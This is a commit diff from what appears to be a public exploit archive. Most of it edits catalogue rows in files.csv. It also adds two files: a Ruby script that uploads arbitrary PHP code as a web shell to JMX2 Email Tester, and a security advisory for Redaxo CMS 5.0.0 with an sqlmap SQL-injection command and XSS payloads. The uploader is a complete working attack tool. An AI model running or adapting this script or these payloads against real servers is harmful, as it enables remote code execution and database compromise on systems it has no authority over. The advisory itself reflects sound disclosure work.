DB: 2016-02-18

2 new exploits
2016-02-18 05:01:30 +00:00 · 2016-02-18 05:01:30 +00:00 · 207c9bac9b
commit 207c9bac9b
parent cc8580757a
5 changed files with 391 additions and 274 deletions
--- a/files.csv
+++ b/files.csv
@ -8825,7 +8825,7 @@ id,file,description,date,author,platform,type,port
 9349,platforms/php/webapps/9349.txt,"Discloser 0.0.4-rc2 (index.php more) SQL Injection Vulnerability",2009-08-03,"Salvatore Fresta",php,webapps,0
 9350,platforms/php/webapps/9350.txt,"MAXcms 3.11.20b RFI / File Disclosure Vulnerabilities",2009-08-03,GoLd_M,php,webapps,0
 9351,platforms/php/webapps/9351.txt,"Payment Processor Script (shop.htm cid) SQL Injection Vulnerability",2009-08-03,ZoRLu,php,webapps,0
-9352,platforms/linux/local/9352.c,"Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure Exploit",2009-08-04,"Jon Oberheide",linux,local,0
+9352,platforms/linux/local/9352.c,"Linux Kernel <= 2.6.31-rc5 - sigaltstack 4-Byte Stack Disclosure Exploit",2009-08-04,"Jon Oberheide",linux,local,0
 9353,platforms/php/webapps/9353.txt,"MOC Designs PHP News 1.1 (Auth Bypass) SQL Injection Vulnerability",2009-08-04,SirGod,php,webapps,0
 9354,platforms/windows/local/9354.pl,"MediaCoder 0.7.1.4486 - (.lst) Universal Buffer Overflow Exploit (SEH)",2009-08-04,germaya_x,windows,local,0
 9355,platforms/php/webapps/9355.txt,"elgg <= 1.5 (/_css/js.php) Local File Inclusion Vulnerability",2009-08-04,eLwaux,php,webapps,0
@ -8978,7 +8978,7 @@ id,file,description,date,author,platform,type,port
 9510,platforms/php/webapps/9510.txt,"Joomla Component com_siirler 1.2 (sid) SQL Injection Vulnerability",2009-08-25,v3n0m,php,webapps,0
 9511,platforms/php/webapps/9511.txt,"Turnkey Arcade Script (id) Remote SQL Injection Vulnerability",2009-08-25,Red-D3v1L,php,webapps,0
 9512,platforms/php/webapps/9512.txt,"TCPDB 3.8 - Remote Content Change Bypass Vulnerabilities",2009-08-25,Securitylab.ir,php,webapps,0
-9513,platforms/linux/local/9513.c,"Linux Kernel <= 2.6.31-rc7 AF_LLC getsockname 5-Byte Stack Disclosure",2009-08-25,"Jon Oberheide",linux,local,0
+9513,platforms/linux/local/9513.c,"Linux Kernel <= 2.6.31-rc7 - AF_LLC getsockname 5-Byte Stack Disclosure",2009-08-25,"Jon Oberheide",linux,local,0
 9514,platforms/hardware/dos/9514.py,"Xerox WorkCentre Multiple Models Denial of Service Exploit",2009-08-25,"Henri Lindberg",hardware,dos,0
 9515,platforms/windows/dos/9515.txt,"Cerberus FTP 3.0.1 (ALLO) Remote Overflow DoS Exploit (meta)",2009-08-25,"Francis Provencher",windows,dos,0
 9516,platforms/windows/dos/9516.txt,"Novell Client for Windows 2000/XP ActiveX Remote DoS Vulnerability",2009-08-25,"Francis Provencher",windows,dos,0
@ -8986,7 +8986,7 @@ id,file,description,date,author,platform,type,port
 9518,platforms/php/webapps/9518.txt,"EMO Breader Manager (video.php movie) SQL Injection Vulnerability",2009-08-25,Mr.SQL,php,webapps,0
 9519,platforms/windows/local/9519.pl,"ProShow Producer / Gold 4.0.2549 - (.psh) Universal BoF Exploit (SEH)",2009-08-25,hack4love,windows,local,0
 9520,platforms/multiple/local/9520.txt,"HyperVM File Permissions Local Vulnerability",2009-08-25,"Xia Shing Zee",multiple,local,0
-9521,platforms/linux/local/9521.c,"Linux Kernel <= 2.6.30 atalk_getname() 8-bytes Stack Disclosure Exploit",2009-08-26,"Clément Lecigne",linux,local,0
+9521,platforms/linux/local/9521.c,"Linux Kernel <= 2.6.30 - atalk_getname() 8-bytes Stack Disclosure Exploit",2009-08-26,"Clément Lecigne",linux,local,0
 9522,platforms/php/webapps/9522.txt,"Moa Gallery <= 1.2.0 - Multiple Remote File Inclusion Vulnerabilities",2009-08-26,"cr4wl3r ",php,webapps,0
 9523,platforms/php/webapps/9523.txt,"Moa Gallery 1.2.0 (index.php action) SQL Injection Vulnerability",2009-08-26,Mr.SQL,php,webapps,0
 9524,platforms/php/webapps/9524.txt,"totalcalendar 2.4 (bsql/lfi) Multiple Vulnerabilities",2009-08-26,Moudi,php,webapps,0
@ -13186,7 +13186,7 @@ id,file,description,date,author,platform,type,port
 15146,platforms/php/webapps/15146.txt,"Achievo 1.4.3 - CSRF Vulnerability",2010-09-28,"Pablo Milano",php,webapps,0
 15147,platforms/php/webapps/15147.txt,"Micro CMS 1.0 b1 - Persistent XSS Vulnerability",2010-09-28,"SecPod Research",php,webapps,0
 15148,platforms/windows/dos/15148.txt,"Microsoft Excel - SxView Record Parsing Heap Memory Corruption",2010-09-29,Abysssec,windows,dos,0
-15150,platforms/linux/local/15150.c,"Linux Kernel < 2.6.36-rc6 pktcdvd Kernel Memory Disclosure",2010-09-29,"Jon Oberheide",linux,local,0
+15150,platforms/linux/local/15150.c,"Linux Kernel < 2.6.36-rc6 - pktcdvd Kernel Memory Disclosure",2010-09-29,"Jon Oberheide",linux,local,0
 15151,platforms/php/webapps/15151.txt,"Webspell 4.2.1 asearch.php SQL Injection Vulnerability",2010-09-29,"silent vapor",php,webapps,0
 15152,platforms/php/webapps/15152.py,"Webspell wCMS-Clanscript4.01.02net<= static&static Blind SQL Injection Vulnerability",2010-09-29,"Easy Laster",php,webapps,0
 15153,platforms/php/webapps/15153.txt,"Webspell 4.x - safe_query Bypass Vulnerability",2010-09-29,"silent vapor",php,webapps,0
@ -18363,8 +18363,8 @@ id,file,description,date,author,platform,type,port
 21068,platforms/cgi/remote/21068.txt,"SIX-webboard 2.01 File Retrieval Vulnerability",2001-08-31,"Hannibal Lector",cgi,remote,0
 21069,platforms/windows/local/21069.c,"Microsoft Windows 2000 RunAs Service Named Pipe Hijacking Vulnerability",2001-12-11,Camisade,windows,local,0
 21070,platforms/osx/local/21070.txt,"Apple Open Firmware 4.1.7/4.1.8 Insecure Password Vulnerability",2001-08-15,"Macintosh Security",osx,local,0
-21071,platforms/windows/local/21071.c,"Microsoft IIS 4/5 - SSI Buffer Overrun Privelege Elevation",2001-08-15,Indigo,windows,local,0
+21071,platforms/windows/local/21071.c,"Microsoft IIS 4/5 - SSI Buffer Overrun Privilege Elevation",2001-08-15,Indigo,windows,local,0
-21072,platforms/windows/local/21072.txt,"Microsoft IIS 5.0 - In-Process Table Privelege Elevation Vulnerability",2001-08-15,"Digital Offense",windows,local,0
+21072,platforms/windows/local/21072.txt,"Microsoft IIS 5.0 - In-Process Table Privilege Elevation Vulnerability",2001-08-15,"Digital Offense",windows,local,0
 21073,platforms/unix/local/21073.txt,"Jakarta Tomcat 3.x/4.0 Error Message Information Disclosure Vulnerability",2001-08-16,LoWNOISE,unix,local,0
 21074,platforms/unix/dos/21074.pl,"glFTPD 1.x LIST Denial of Service Vulnerability",2001-08-17,"ASGUARD LABS",unix,dos,0
 21075,platforms/linux/remote/21075.txt,"SuSE 6.3/6.4/7.0 sdb Arbitrary Command Execution Vulnerability",2001-08-02,"Maurycy Prodeus ",linux,remote,0
@ -29228,7 +29228,7 @@ id,file,description,date,author,platform,type,port
 32437,platforms/php/webapps/32437.txt,"LifeSize UVC 1.2.6 - Authenticated RCE Vulnerabilities",2014-03-22,"Brandon Perry",php,webapps,0
 32438,platforms/windows/remote/32438.rb,"Microsoft Internet Explorer - TextRange Use-After-Free (MS14-012)",2014-03-22,metasploit,windows,remote,0
 32439,platforms/php/remote/32439.rb,"Horde Framework Unserialize PHP Code Execution",2014-03-22,metasploit,php,remote,80
-32440,platforms/hardware/remote/32440.rb,"Array Networks vAPV and vxAG - Private Key Privelege Escalation Code Execution",2014-03-22,metasploit,hardware,remote,22
+32440,platforms/hardware/remote/32440.rb,"Array Networks vAPV and vxAG - Private Key Privilege Escalation Code Execution",2014-03-22,metasploit,hardware,remote,22
 32441,platforms/php/webapps/32441.txt,"PHPJabbers Post Comments 3.0 Cookie Authentication Bypass Vulnerability",2008-09-29,Crackers_Child,php,webapps,0
 32442,platforms/windows/remote/32442.c,"Nokia PC Suite <= 7.0 - Remote Buffer Overflow Vulnerability",2008-09-29,Ciph3r,windows,remote,0
 32443,platforms/php/webapps/32443.txt,"CAcert 'analyse.php' Cross-Site Scripting Vulnerability",2008-09-29,"Alexander Klink",php,webapps,0
@ -35694,3 +35694,5 @@ id,file,description,date,author,platform,type,port
 39452,platforms/windows/dos/39452.txt,"CyberCop Scanner Smbgrind 5.5 - Buffer Overflow",2016-02-16,hyp3rlinx,windows,dos,0
 39453,platforms/php/webapps/39453.txt,"phpMyBackupPro 2.5 - Remote Command Execution / CSRF",2016-02-16,hyp3rlinx,php,webapps,0
 39454,platforms/linux/dos/39454.txt,"glibc - getaddrinfo Stack-Based Buffer Overflow",2016-02-16,"Google Security Research",linux,dos,0
 39456,platforms/multiple/webapps/39456.rb,"JMX2 Email Tester - (save_email.php) Web Shell Upload",2016-02-17,HaHwul,multiple,webapps,0
 39459,platforms/php/webapps/39459.txt,"Redaxo CMS 5.0.0 - Multiple Vulnerabilities",2016-02-17,"LSE Leading Security Experts GmbH",php,webapps,80
--- a/platforms/multiple/webapps/39456.rb
+++ b/platforms/multiple/webapps/39456.rb
@ -0,0 +1,45 @@
 # Exploit Title: JMX2 Email Tester - Web Shell Upload(save_email.php)
 # Date: 2016-02-15
 # Blog: http://www.hahwul.com
 # Vendor Homepage: https://github.com/johnfmorton/jmx2-Email-Tester
 # Software Link: https://github.com/johnfmorton/jmx2-Email-Tester/archive/master.zip
 # Tested on: debian [wheezy]
 # CVE : none
 require "net/http"
 require "uri"
 require 'uri-handler'
 if ARGV.length != 2
 puts "JMX2 Email Tester Web Shell Uploader"
 puts "Usage: #>ruby jmx2Email_exploit.rb [targetURL] [phpCode]"
 puts "  targetURL(ex): http://127.0.0.1/vul_test/jmx2-Email-Tester"
 puts "  phpCode(ex): echo 'zzzzz'"
 puts "  Example : ~~.rb http://127.0.0.1/vul_test/jmx2-Email-Tester/emailTester 'echo zzzz'"
 puts "  Install GEM: #> gem install uri-handler"
 puts "  exploit & code by hahwul[www.hahwul.com]" 
 else
 target_url = ARGV[0]    # http://127.0.0.1/jmx2-Email-Tester/
 shell = ARGV[1]    # PHP Code
 shell = shell.to_uri
 exp_url = target_url + "/models/save_email.php"
 puts shell
 uri = URI.parse(exp_url)
 http = Net::HTTP.new(uri.host, uri.port)
 puts exp_url
 request = Net::HTTP::Post.new(uri.request_uri)
 request["Accept-Encoding"] = "gzip, deflate"
 request["Referer"] = "http://127.0.0.1/vul_test/jmx2-Email-Tester/emailTester/"
 request["User-Agent"] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0"
 request["Accept"] = "application/json, text/javascript, */*; q=0.01"
 request["Content-Type"] = "application/x-www-form-urlencoded; charset=UTF-8"
 request["Connection"] = "keep-alive"
 request.set_form_data({"orgfilename"=>"test-email-1455499197-org.html","thecontent"=>"%3Chtml%3E%0A%20%20%20%3C%3Fphp%20%0A#{shell}%0A%3F%3E%0A%3C%2Fhtml%3E","inlinefilename"=>"test-email-1455499197-inline.php"})
 response = http.request(request)
 puts "[Result] Status code: "+response.code
 puts "[Result] Open Browser: "+target_url+"/_saved_email_files/test-email-1455499197-inline.php"
 end
--- a/platforms/php/webapps/39459.txt
+++ b/platforms/php/webapps/39459.txt
@ -0,0 +1,70 @@
 === LSE Leading Security Experts GmbH - Security Advisory 2016-01-18 ===
 Redaxo CMS contains multiple vulnerabilities
 -------------------------------------------------------------
 Problem Overview
 ================
 Technical Risk: high
 Likelihood of Exploitation: medium
 Vendor: https://www.redaxo.org/
 Tested version: Redaxo CMS v5.0.0
 Credits: LSE Leading Security Experts GmbH employee Tim Herres
 Advisory URL: https://www.lsexperts.de/advisories/lse-2016-01-18.txt
 Advisory Status: Public
 CVE-Number: na
 Impact
 ======
 Redaxo is an easy to use open source content management system. A user can create his own website using the Redaxo CMS.
 During internal research, multiple vulnerabilities were identified in the Redaxo CMS software.
 The software is vulnerable to an SQL-Injection attack, allowing an authenticated user to access the database in an unsafe way.
 Some parts of the application do not have sufficient input validation and output encoding. This means user supplied input is inserted in an unsafe way
 resulting in a Cross Site Scripting vulnerability.
 Issue Description
 =================
 The following vulnerabilities are only examples. It is highly recommended to check the whole application for similar vulnerabilities.
 1) SQL Injection in the "Mediapool" component:
 Authentication required: yes
 User needs access to the "Mediapool".
 POC:
 Exploitation using SQL Map
 sqlmap -u "https://127.0.0.1/redaxo/index.php?page=mediapool%2fmedia&rex_file_category=0&media_name=blub&undefined=%0d" --cookie="PHPSESSID=h9s74l660iongtg71bpkjup0d1" -p media_name
 Parameter: media_name (GET)
 Type: stacked queries
 Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
 Payload: page=mediapool/media&rex_file_category=0&media_name=test');(SELECT * FROM (SELECT(SLEEP(5)))jbWV)#&undefined=
 2) Reflected XSS
 Authentication required: yes
 Used browser: FF42
 Example:
 https://127.0.0.1/redaxo/index.php?page=mediapool/media&info=Datei+tot.<script>alert("xss");</script>&opener_input_field=
 3) Stored XSS (persistent XSS)
 Authentication required: yes
 Used browser: FF42
 It is possible to store JavaScript Code in input fields.
 Example:
 Menu --> "Mediapool" --> "Media Category Managing" --> Add --> Name field
 Payload:<script>alert("xss")</script>
 Response:
 [...]
 [...]href="index.php?page=mediapool/structure&cat_id=801"><script>alert("xss");</script></a></li></ol></div><section class="rex-page-sectio
 [...]
 Temporary Workaround and Fix
 ============================
 Update to Version 5.0.1
 History
 =======
 2016-01-18  Issues discovered
 2016-01-29  Vendor contacted
 2016-02-05  Vendor confirmed
 2016-02-09  Vendor released patch
 2016-02-16  Advisory released